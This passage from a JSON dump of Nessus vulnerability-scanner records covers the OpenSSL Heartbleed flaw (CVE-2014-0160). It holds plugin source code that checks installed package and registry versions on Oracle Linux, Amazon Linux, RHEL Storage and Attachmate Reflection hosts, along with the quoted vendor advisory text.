v1) protocols, as well as a\nfull-strength, general purpose cryptography library.\n\nAn information disclosure flaw was found in the way OpenSSL handled\nTLS and DTLS Heartbeat Extension packets. A malicious TLS or DTLS\nclient or server could send a specially crafted TLS or DTLS Heartbeat\npacket to disclose a limited portion of memory per request from a\nconnected client or server. Note that the disclosed portions of memory\ncould potentially include sensitive information such as private keys.\n(CVE-2014-0160)\n\nRed Hat would like to thank the OpenSSL project for reporting this\nissue. Upstream acknowledges Neel Mehta of Google Security as the\noriginal reporter.\n\nAll OpenSSL users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue. For the update\nto take effect, all services linked to the OpenSSL library (such as\nhttpd and other SSL-enabled services) must be restarted or the system\nrebooted.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://oss.oracle.com/pipermail/el-errata/2014-April/004065.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected openssl packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-0160\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'OpenSSL Heartbeat Information Leak');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/04/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:openssl-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:openssl-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:openssl-static\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"EL6\", reference:\"openssl-1.0.1e-16.el6_5.7\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"openssl-devel-1.0.1e-16.el6_5.7\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"openssl-perl-1.0.1e-16.el6_5.7\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"openssl-static-1.0.1e-16.el6_5.7\")) flag++;\n\n\nif (flag)\n{\n report = rpm_report_get();\n\n if(!egrep(pattern:\"package installed.+openssl[^0-9]*\\-1\\.0\\.1\", string:report)) exit(0, \"The remote host does not use OpenSSL 1.0.1\");\n\n if (report_verbosity > 0) security_warning(port:0, extra:report);\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-05-21T15:04:07", "description": "A missing bounds check was found in the way OpenSSL handled TLS heartbeat extension packets. This flaw could be used to reveal up to 64k of memory from a connected client or server.", "cvss3": {"score": null, "vector": null}, "published": "2014-04-09T00:00:00", "type": "nessus", "title": "Amazon Linux AMI : openssl Information Disclosure Vulnerability (ALAS-2014-320)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2022-05-05T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:openssl", "p-cpe:/a:amazon:linux:openssl-debuginfo", "p-cpe:/a:amazon:linux:openssl-devel", "p-cpe:/a:amazon:linux:openssl-perl", "p-cpe:/a:amazon:linux:openssl-static", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2014-320.NASL", "href": "https://www.tenable.com/plugins/nessus/73438", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2014-320.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(73438);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/05\");\n\n script_cve_id(\"CVE-2014-0160\");\n script_xref(name:\"ALAS\", value:\"2014-320\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/25\");\n\n script_name(english:\"Amazon Linux AMI : openssl Information Disclosure Vulnerability (ALAS-2014-320)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Amazon Linux AMI host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"A missing bounds check was found in the way OpenSSL handled TLS\nheartbeat extension packets. This flaw could be used to reveal up to\n64k of memory from a connected client or server.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://heartbleed.com/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/secadv/20140407.txt\");\n # http://aws.amazon.com/amazon-linux-ami/security-bulletins/ALAS-2014-320/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?5c70c979\");\n script_set_attribute(attribute:\"solution\", value:\n\"Run 'yum update openssl' to update your system and restart all\nservices that are using openssl. While the new package is still\nnamed openssl-1.0.1e, it does contain the fix for CVE-2014-0160.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:N\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'OpenSSL Heartbeat (Heartbleed) Information Leak');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/04/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:openssl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:openssl-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:openssl-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:openssl-static\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/AmazonLinux/release\")) audit(AUDIT_OS_NOT, \"Amazon Linux AMI\");\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"openssl-1.0.1e-37.66.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"openssl-debuginfo-1.0.1e-37.66.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"openssl-devel-1.0.1e-37.66.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"openssl-perl-1.0.1e-37.66.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"openssl-static-1.0.1e-37.66.amzn1\")) flag++;\n\nif (flag)\n{\n report = rpm_report_get();\n if (!egrep(pattern:\"package installed.+openssl[^0-9]*\\-1\\.0\\.1\", string:report)) exit(0, \"The remote host does not use OpenSSL 1.0.1.\");\n\n if (report_verbosity > 0) security_hole(port:0, extra:report);\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"openssl / openssl-debuginfo / openssl-devel / openssl-perl / etc\");\n}\n", "cvss": {"score": 9.4, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:N"}}, {"lastseen": "2022-05-21T15:15:33", "description": "The Attachmate Reflection install on the remote host is affected by an out-of-bounds read error known as the 'Heartbleed Bug' in the included OpenSSL version.\n\nThis error is related to handling TLS heartbeat extensions that could allow an attacker to obtain sensitive information such as primary key material, secondary key material, and other protected content.", "cvss3": {"score": 7.5, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2014-06-30T00:00:00", "type": "nessus", "title": "Attachmate Reflection Heartbeat Information Disclosure (Heartbleed)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2022-05-05T00:00:00", "cpe": ["cpe:/a:attachmate:reflection"], "id": "ATTACHMATE_REFLECTION_HEARTBLEED.NASL", "href": "https://www.tenable.com/plugins/nessus/76309", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(76309);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/05\");\n\n script_cve_id(\"CVE-2014-0160\");\n script_bugtraq_id(66690);\n script_xref(name:\"CERT\", value:\"720951\");\n script_xref(name:\"EDB-ID\", value:\"32745\");\n script_xref(name:\"EDB-ID\", value:\"32764\");\n script_xref(name:\"EDB-ID\", value:\"32791\");\n script_xref(name:\"EDB-ID\", value:\"32998\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/25\");\n\n script_name(english:\"Attachmate Reflection Heartbeat Information Disclosure (Heartbleed)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An application on the remote host is affected by an information\ndisclosure vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Attachmate Reflection install on the remote host is affected by an\nout-of-bounds read error known as the 'Heartbleed Bug' in the included\nOpenSSL version.\n\nThis error is related to handling TLS heartbeat extensions that could\nallow an attacker to obtain sensitive information such as primary key\nmaterial, secondary key material, and other protected content.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://support.attachmate.com/techdocs/1708.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://support.attachmate.com/techdocs/2502.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.heartbleed.com\");\n script_set_attribute(attribute:\"see_also\", value:\"https://eprint.iacr.org/2014/140\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/vulnerabilities.html#2014-0160\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/secadv/20140407.txt\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Reflection 14.1 SP3 Update 1 (14.1.3.247) or 2014 R1 Hotfix\n4 (15.6.0.660) or greater.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-0160\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/02/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/30\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:attachmate:reflection\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_hotfixes.nasl\");\n script_require_keys(\"SMB/Registry/Enumerated\", \"Settings/ParanoidReport\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_reg_query.inc\");\ninclude(\"misc_func.inc\");\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nport = kb_smb_transport();\nappname = 'Attachmate Reflection';\n\ndisplay_names = get_kb_list('SMB/Registry/HKLM/SOFTWARE/Microsoft/Windows/CurrentVersion/Uninstall/*/DisplayName');\n\nin_registry = FALSE;\n# Ignore Attachmate Reflection X in this plugin\nforeach key (display_names)\n if (\n \"Attachmate Reflection \" >< key\n &&\n \"Attachmate Reflection X \" >!< key\n ) in_registry = TRUE;\n\nif (!in_registry) audit(AUDIT_NOT_INST, appname);\n\nregistry_init();\nhklm = registry_hive_connect(hive:HKEY_LOCAL_MACHINE, exit_on_fail:TRUE);\n\npath = NULL;\n\nforeach key (keys(display_names))\n{\n display_name = display_names[key];\n\n if (\n \"Attachmate Reflection \" >!< display_name\n ||\n \"Attachmate Reflection X \" >< display_name\n )\n continue;\n key -= '/DisplayName';\n\n key -= 'SMB/Registry/HKLM/';\n key = str_replace(string:key, find:\"/\", replace:'\\\\');\n break;\n}\n\n# Very rough check on ver in registry\ndisplay_version_key = key + \"\\DisplayVersion\";\ndisplay_version = get_registry_value(handle:hklm, item:display_version_key);\nif (\n isnull(display_version) ||\n display_version !~ \"^(14\\.1\\.3|15\\.6)($|[^0-9])\"\n)\n{\n RegCloseKey(handle:hklm);\n close_registry();\n if (isnull(display_version))\n audit(AUDIT_UNKNOWN_APP_VER, appname);\n else\n audit(AUDIT_NOT_INST, appname + \"14.1.3.x / 2014 R1\");\n}\n\n# Get install dir\ninstall_location_key = key + \"\\InstallLocation\";\ninstall_location = get_registry_value(handle:hklm, item:install_location_key);\nif (isnull(install_location))\n{\n RegCloseKey(handle:hklm);\n close_registry();\n audit(AUDIT_PATH_NOT_DETERMINED, appname);\n}\nRegCloseKey(handle:hklm);\n\nitem = eregmatch(pattern:\"^(.+\\\\)[^\\\\]*$\", string:install_location);\nif (isnull(item))\n{\n close_registry();\n audit(AUDIT_PATH_NOT_DETERMINED, appname);\n}\nclose_registry(close:FALSE);\n\npath = item[1];\n\n# At the least, make sure a file exists\n# to verify the registry info a bit\nexe = path + \"openssl.dll\";\nexe_exists = hotfix_file_exists(path:exe);\nhotfix_check_fversion_end();\nif (!exe_exists) audit(AUDIT_FN_FAIL, \"hotfix_file_exists\", \"data that indicates the file '\"+exe+\"' is no longer present.\");\n\n# Parse out numeric version from registry entry version\n# Registry version is formatted like :\n# major.minor.{sp}{build}\n# where {sp} is one digit (for now) and {build} is three\nmatches = eregmatch(string:display_version, pattern:\"^(\\d+)\\.(\\d+)\\.(\\d+)(\\d{3})\");\nif (matches)\n{\n major = matches[1];\n minor = matches[2];\n sp = matches[3];\n build = matches[4];\n version = major + \".\" + minor + \".\" + sp + \".\" + build;\n}\nelse\n audit(AUDIT_UNKNOWN_APP_VER, appname);\n\n# 14.1.3.000 is 14 SP3 (earliest vuln)\n# 15.6.0.000 is 2014 R1 (earliest vuln)\n# Vendor states 14.1.3.247 / 15.6.0.660 is main app fix ver\nif (\n version =~ \"^14\\.\" && ver_compare(ver:version, fix:\"14.1.3.247\", strict:FALSE) < 0\n ||\n version =~ \"^15\\.\" && ver_compare(ver:version, fix:\"15.6.0.660\", strict:FALSE) < 0\n)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Product : ' + appname +\n '\\n Installed version : ' + version +\n '\\n Fixed version : Reflection 14.1 SP3 Update 1 (14.1.3.247) / 2014 R1 Hotfix 4 (15.6.0.660)' +\n '\\n';\n security_warning(port:port, extra:report);\n }\n else security_warning(port);\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, appname, display_version);\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-05-21T15:34:26", "description": "Updated openssl packages that fix one security issue are now available for Red Hat Storage 2.1.\n\nThe Red Hat Security Response Team has rated this update as having Important security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nOpenSSL is a toolkit that implements the Secure Sockets Layer (SSL v2/v3) and Transport Layer Security (TLS v1) protocols, as well as a full-strength, general purpose cryptography library.\n\nAn information disclosure flaw was found in the way OpenSSL handled TLS and DTLS Heartbeat Extension packets. A malicious TLS or DTLS client or server could send a specially crafted TLS or DTLS Heartbeat packet to disclose a limited portion of memory per request from a connected client or server. Note that the disclosed portions of memory could potentially include sensitive information such as private keys.\n(CVE-2014-0160)\n\nRed Hat would like to thank the OpenSSL project for reporting this issue. Upstream acknowledges Neel Mehta of Google Security as the original reporter.\n\nAll users of Red Hat Storage are advised to upgrade to these updated packages, which contain a backported patch to correct this issue. For the update to take effect, all services linked to the OpenSSL library (such as httpd and other SSL-enabled services) must be restarted or the system rebooted.", "cvss3": {"score": 7.5, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2014-11-08T00:00:00", "type": "nessus", "title": "RHEL 6 : Storage Server (RHSA-2014:0377) (Heartbleed)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2022-05-05T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:openssl", "p-cpe:/a:redhat:enterprise_linux:openssl-debuginfo", "p-cpe:/a:redhat:enterprise_linux:openssl-devel", "p-cpe:/a:redhat:enterprise_linux:openssl-perl", "p-cpe:/a:redhat:enterprise_linux:openssl-static", "cpe:/o:redhat:enterprise_linux:6"], "id": "REDHAT-RHSA-2014-0377.NASL", "href": "https://www.tenable.com/plugins/nessus/79005", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2014:0377. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(79005);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/05\");\n\n script_cve_id(\"CVE-2014-0160\");\n script_bugtraq_id(66690);\n script_xref(name:\"RHSA\", value:\"2014:0377\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/25\");\n\n script_name(english:\"RHEL 6 : Storage Server (RHSA-2014:0377) (Heartbleed)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"Updated openssl packages that fix one security issue are now available\nfor Red Hat Storage 2.1.\n\nThe Red Hat Security Response Team has rated this update as having\nImportant security impact. A Common Vulnerability Scoring System\n(CVSS) base score, which gives a detailed severity rating, is\navailable from the CVE link in the References section.\n\nOpenSSL is a toolkit that implements the Secure Sockets Layer (SSL\nv2/v3) and Transport Layer Security (TLS v1) protocols, as well as a\nfull-strength, general purpose cryptography library.\n\nAn information disclosure flaw was found in the way OpenSSL handled\nTLS and DTLS Heartbeat Extension packets. A malicious TLS or DTLS\nclient or server could send a specially crafted TLS or DTLS Heartbeat\npacket to disclose a limited portion of memory per request from a\nconnected client or server. Note that the disclosed portions of memory\ncould potentially include sensitive information such as private keys.\n(CVE-2014-0160)\n\nRed Hat would like to thank the OpenSSL project for reporting this\nissue. Upstream acknowledges Neel Mehta of Google Security as the\noriginal reporter.\n\nAll users of Red Hat Storage are advised to upgrade to these updated\npackages, which contain a backported patch to correct this issue. For\nthe update to take effect, all services linked to the OpenSSL library\n(such as httpd and other SSL-enabled services) must be restarted or\nthe system rebooted.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2014:0377\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2014-0160\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-0160\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/04/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openssl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openssl-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openssl-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openssl-static\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2014:0377\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n\n if (! (rpm_exists(release:\"RHEL6\", rpm:\"redhat-storage-server\"))) audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Storage Server\");\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"openssl-1.0.1e-16.el6_5.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"openssl-debuginfo-1.0.1e-16.el6_5.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"openssl-devel-1.0.1e-16.el6_5.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"openssl-perl-1.0.1e-16.el6_5.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"openssl-static-1.0.1e-16.el6_5.7\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"openssl / openssl-debuginfo / openssl-devel / openssl-perl / etc\");\n }\n}\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-05-21T15:12:58", "description": "- tor 0.2.4.22 [bnc#878486] Tor was updated to the recommended version of the 0.2.4.x series.\n\n - major features in 0.2.4.x :\n\n - improved client resilience\n\n - support better link encryption with forward secrecy\n\n - new NTor circuit handshake\n\n - change relay queue for circuit create requests from size-based limit to time-based limit\n\n - many bug fixes and minor features\n\n - changes contained in 0.2.4.22: Backports numerous high-priority fixes. These include blocking all authority signing keys that may have been affected by the OpenSSL 'heartbleed' bug, choosing a far more secure set of TLS ciphersuites by default, closing a couple of memory leaks that could be used to run a target relay out of RAM.\n\n - Major features (security)\n\n - Block authority signing keys that were used on authorities vulnerable to the 'heartbleed' bug in OpenSSL (CVE-2014-0160).\n\n - Major bugfixes (security, OOM) :\n\n - Fix a memory leak that could occur if a microdescriptor parse fails during the tokenizing step.\n\n - Major bugfixes (TLS cipher selection) :\n\n - The relay ciphersuite list is now generated automatically based on uniform criteria, and includes all OpenSSL ciphersuites with acceptable strength and forward secrecy.\n\n - Relays now trust themselves to have a better view than clients of which TLS ciphersuites are better than others.\n\n - Clients now try to advertise the same list of ciphersuites as Firefox 28.\n\n - includes changes from 0.2.4.21: Further improves security against potential adversaries who find breaking 1024-bit crypto doable, and backports several stability and robustness patches from the 0.2.5 branch.\n\n - Major features (client security) :\n\n - When we choose a path for a 3-hop circuit, make sure it contains at least one relay that supports the NTor circuit extension handshake. Otherwise, there is a chance that we're building a circuit that's worth attacking by an adversary who finds breaking 1024-bit crypto doable, and that chance changes the game theory.\n\n - Major bugfixes :\n\n - Do not treat streams that fail with reas